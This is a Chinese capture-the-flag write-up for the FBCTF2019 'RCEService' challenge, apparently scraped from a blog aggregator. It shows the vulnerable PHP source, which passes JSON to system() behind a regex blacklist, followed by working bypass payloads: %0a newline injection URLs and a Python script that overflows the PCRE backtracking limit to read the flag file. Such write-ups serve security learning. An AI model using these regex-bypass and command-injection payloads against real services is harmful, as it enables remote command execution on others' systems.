当前位置: 首页 > news >正文

[FBCTF2019]RCEService (PCRE回溯绕过和%a0换行绕过)

json格式输入ls出现index.php

这道题原本是给了源码的,BUUCTF没给

源码:

<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) {$json = $_REQUEST['cmd'];if (!is_string($json)) {echo 'Hacking attempt detected<br/><br/>';} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {echo 'Hacking attempt detected<br/><br/>';} else {echo 'Attempting to run command:<br/>';$cmd = json_decode($json, true)['cmd'];	//将cmd键的值给$cmdif ($cmd !== NULL) {system($cmd);	//绕过过滤执行命令} else {echo 'Invalid input';}echo '<br/><br/>';}
}
?>

可用bash命令有: cat tac nl more wget grep tail flag less head sed cut awk strings od curl scp rm xxd mv cp pwd ls echo sed sort

可以发现过滤了相当多的字符,但是可以注意到正则匹配表达式采用了^xxx$的格式,同时也采用了.*这样的贪婪匹配,所以有两个方案来绕过正则——回溯次数超限和利用%0a。

其次需要注意putenv('PATH=/home/rceservice/jail');意味着我们无法直接去调用cat等命令,因为这些命令实际上是存放在特定目录中封装好的程序,PATH环境变量就是存放这些特定目录的路径方便我们去直接调用这些命令,所以此处部分命令我们得使用其存放的绝对路径去调用(不知道这些命令在哪可以用whereis命令在自己VPS上查找)。

%0a

preg_replace函数可以匹配并替换字符串中的指定模式,但默认只会替换第一个匹配到的部分

%0a对于^xxx$这个格式的绕过太常见了,只需要注意下表达式中存在一段

image-20220323113348315

会匹配一个%0a,但多在payload前后加几个%0a就行了。

构造payload:

?cmd={%0a"cmd":"ls%20/"%0a}

未发现flag,使用find找一下

构造payload:

?cmd={%0a"cmd":"/usr/bin/find / -name *flag*"%0a}

不能直接用的命令可以自己在虚拟机上whereis找一下路径,因为环境变量被改了

发现第一个也在源码设置的环境变量路径下,多半是这个了

构造最终payload:

?cmd={%0a"cmd":"/usr/bin/head /home/rceservice/flag"%0a}

拿到flag

第二种方法参考皮神文章

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

直接上exp

import requestsurl  = "http://0097b389-a7a5-4d40-b4d1-5ca389bc0b66.node5.buuoj.cn:81/"
payload = '{"cmd": "/bin/cat /home/rceservice/flag", "zz": "'+"a"*(1000000)+'"}'
res = requests.post(url, data={"cmd": payload}, timeout=10)
print(res.text)

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 个性化你的生产力工具:待办事项App定制指南
  • hadoop学习笔记4-mapreduce
  • 【书生大模型实战营】基础岛-8G 显存玩转书生大模型 Demo
  • 双向链表的基本操作
  • vue实现电子签名、图片合成、及预览功能
  • 订单搜索分页查询业务
  • 创建了Vue项目,需要导入什么插件以及怎么导入
  • [HITCON 2017]SSRFme 1
  • LInux:循环语句
  • Servlet (1)
  • 【2024】InfluxDB v2 介绍和安装使用(1)
  • Thread-Caching Malloc 简介
  • 第十九天内容
  • 君正T41开发板环境搭建_串口登陆_配置IP_telnet登陆_mount挂载_安装交叉编译工具链
  • Redis篇之持久化数据恢复
  • 【刷算法】求1+2+3+...+n
  • Angular2开发踩坑系列-生产环境编译
  • create-react-app项目添加less配置
  • Cumulo 的 ClojureScript 模块已经成型
  • Docker 1.12实践:Docker Service、Stack与分布式应用捆绑包
  • Golang-长连接-状态推送
  • LintCode 31. partitionArray 数组划分
  • node-glob通配符
  • TypeScript实现数据结构(一)栈,队列,链表
  • 排序算法学习笔记
  • 前端
  • 什么软件可以剪辑音乐?
  • 微信小程序设置上一页数据
  • 智能合约开发环境搭建及Hello World合约
  • 【运维趟坑回忆录】vpc迁移 - 吃螃蟹之路
  • 阿里云API、SDK和CLI应用实践方案
  • 翻译 | The Principles of OOD 面向对象设计原则
  • ​无人机石油管道巡检方案新亮点:灵活准确又高效
  • # MySQL server 层和存储引擎层是怎么交互数据的?
  • (02)Hive SQL编译成MapReduce任务的过程
  • (13):Silverlight 2 数据与通信之WebRequest
  • (14)Hive调优——合并小文件
  • (2)nginx 安装、启停
  • (zt)最盛行的警世狂言(爆笑)
  • (附源码)SSM环卫人员管理平台 计算机毕设36412
  • (十三)Maven插件解析运行机制
  • (原創) 如何安裝Linux版本的Quartus II? (SOC) (Quartus II) (Linux) (RedHat) (VirtualBox)
  • (转)IIS6 ASP 0251超过响应缓冲区限制错误的解决方法
  • (转)总结使用Unity 3D优化游戏运行性能的经验
  • (转载)Linux网络编程入门
  • (轉貼) 蒼井そら挑戰筋肉擂台 (Misc)
  • .NET Core6.0 MVC+layui+SqlSugar 简单增删改查
  • .net FrameWork简介,数组,枚举
  • .NET MAUI学习笔记——2.构建第一个程序_初级篇
  • .NET开源纪元:穿越封闭的迷雾,拥抱开放的星辰
  • .net知识和学习方法系列(二十一)CLR-枚举
  • .vimrc 配置项
  • /proc/interrupts 和 /proc/stat 查看中断的情况
  • /usr/bin/env: node: No such file or directory
  • @Autowired 与@Resource的区别